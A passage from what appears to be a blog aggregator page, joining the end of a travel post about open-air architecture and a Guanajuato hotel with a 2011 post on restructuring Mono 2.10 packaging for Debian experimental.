Guadalajara area. Some restaurants could have been described as buildings with large, open windows so you feel a lot of breeze while inside. Or perhaps as a simple shade roof with a few supports on the edges, so you re never really inside at all (sort of like going under a small shade tent outdoors). To the extent that windows could close, many of them couldn t be made airtight. It was clear that in that area, people spend more energy finding ways to invite the outdoors in rather than to keep it out, thanks to the year-round moderate climate. Perhaps the best example of this surprised me one evening. We were arriving in Guanajuato, an old silver mining town in the mountains, and were going to spend the night at Hotel Socav n, which had been recommended to us by a local friend of Jonathan s. From the street, the hotel looked tiny. But walk in, and you get in this old-looking (and feeling) entry tunnel: That s the front desk, apparently cut out of it there on the right. We asked to see some of the rooms before buying apparently a normal request around there. The innkeeper agreed, and gave us keys and directions to find them on the third floor. It included going up 2 flights of stairs, passing through a courtyard, and going up another flight. It was after dark, and the hotel was dimly lit something I was fine with. I thought we were stepping out into a beautiful atrium with some potted plants in the center of the building something fairly common in some nicer hotels. Until I felt rain on my head. Then I realized that the courtyard, which began two floors up from the street, was open to the sky. Beautiful! Here was the view from out room door: And down the hall : After getting home, a Google happened to turn up some reviews of this hotel. I was so annoyed at what some people wrote! One person gave them only 3 stars because they didn t have air conditioning, had poor water pressure, and lots of steps . Someone else complained of the dark entry tunnel something I couldn t help but smiling about the moment I entered. My review, which should hopefully get posted soon, is certainly different. I gave them 5 stars, because if I wanted a Super 8 with generic fluorescent lighting and the same layout as thousands of other hotels, I would have gone to Nebraska instead of Mexico. Most homes and local hotels in the region don t have air conditioning because they don t need it, and that s just how water pressure is in Mexico (due to needing to pump it from municipal supplies to private storage tanks overhead). And who doesn t appreciate entering a hotel through a brick tunnel? Ah, sigh This should give you some idea of the kind of travel we like: part of the point of traveling is enjoying the differences from home, and I think it is a huge mistake to be annoyed at everything that is different. Enjoy the differences! Finally, here s a photo of the staircase in the home we stayed in, which I thought was fascinating:

14 April 2011

Mirco Bauer: The Big Split: Mono 2.10 Debian Packaging

Most probably haven't noticed yet but I finished the Mono 2.10.1 debian packaging effort of the past 3 months and uploaded it to Debian/Experimental. With Mono 2.10 I had to make the biggest changes in Mono packaging since the big Mono 2.0 upload. The runtime no longer supports the 1.0 and 2.0 runtime profile, instead it now supports the 2.0 and 4.0 runtime profile. This meant I had to drop all libmono*1.0-cil packages and add libmono*4.0-cil packages. This sounds like a lot of s/1.0/4.0/ work but it actually wasn't. Mono 2.10 ships a lot of new libraries over 2.6 and I had again to decide where they should go. "Where should this $library go?" I have been playing this game for the past 7 years maintaining Mono and I finally gave up on it... What, where, when, why? I could give now a 2 hours talk of the issues behind the current packaging approach (keeping the number of library packages low) but instead I will do something else. Please, just take a look at this picture for a second: Brain Melting Device If your browser crashed, your eyes hurt or your brain simply melted, I think you have got the idea. The Big Split The cure? cli-common-dev! This is a package that contains 2 extremely important debhelper packaging tools for packaging Mono/CLI related packages called dh_makeclilibs and dh_clideps. If you don't know these, they do exact the same thing as dh_makeshlibs and dh_shlibdeps do. dh_makeclilibs generates library dependency tracking information and dh_clideps consumes that information to automatically generate the package dependencies for you. So each library of the 4.0 runtime profile has now it's own package, simple as that, the rest does cli-common-dev for me and you. "Hey, that Mono packaging bastard is polluting the Debian archive because of his laziness!" No, I am not. This packaging change not only has the advantage of simplifying the packaging and with that bringing new Mono versions faster to you but also reduces the typical install size for applications as they will only pull in the really used libraries of Mono instead of groups of them. I don't have any numbers handy right now as none of the applications are built against Mono 2.10 (yet), but when the transition starts we will get numbers. New Features There is also a new SGen flavor of Mono available called mono-runtime-sgen which is no longer using the conservative non-generational Boehm's garbage collector but SGen which is a simple generational garbage collector with promising advantages. And here some more Mono 2.8/2.10 news from /usr/share/doc/mono-runtime/NEWS.Debian.gz: Architecture Regressions With the initial upload of Mono 2.10.1 to Debian/Experimental the architecture world broke apart and it regressed on all Mono architectures except for i386 and amd64 :-D There is a reason it's called experimental isn't there? In mono 2.10.1-3 I could solve all regressions except for kfreebsd-* and armel. Jo Shields fixed the remaining regressions and the world started to look good again in mono 2.10.1-4! He also took care of mono-basic, mod-mono and xsp, but mod-mono and xsp are still waiting for the translation call deadline to pass by so they can also be uploaded to Debian/Experimental. Planned Transition As mentioned above, there will be a Mono 2.10 transition needed when the packages hit Debian/Unstable. There is no ETA yet on this when it will happen as I have to coordinate this with debian-release first. But as things are not showtime ready in experimental anyhow, this will not happen too soonish. The Mono 2.10 transition plan will be covered in a following post. GIVMENOWPLX OMG, all this rumbling about Mono 2.10 and I still haven't said a word on how to obtain it, sorry about this, just do this and I will shut up now:
echo "deb experimental main" >> /etc/apt/sources.list
apt-get update
apt-get install -t experimental mono-complete
(this is the easiest way of getting only mono 2.10.1 from experimental)

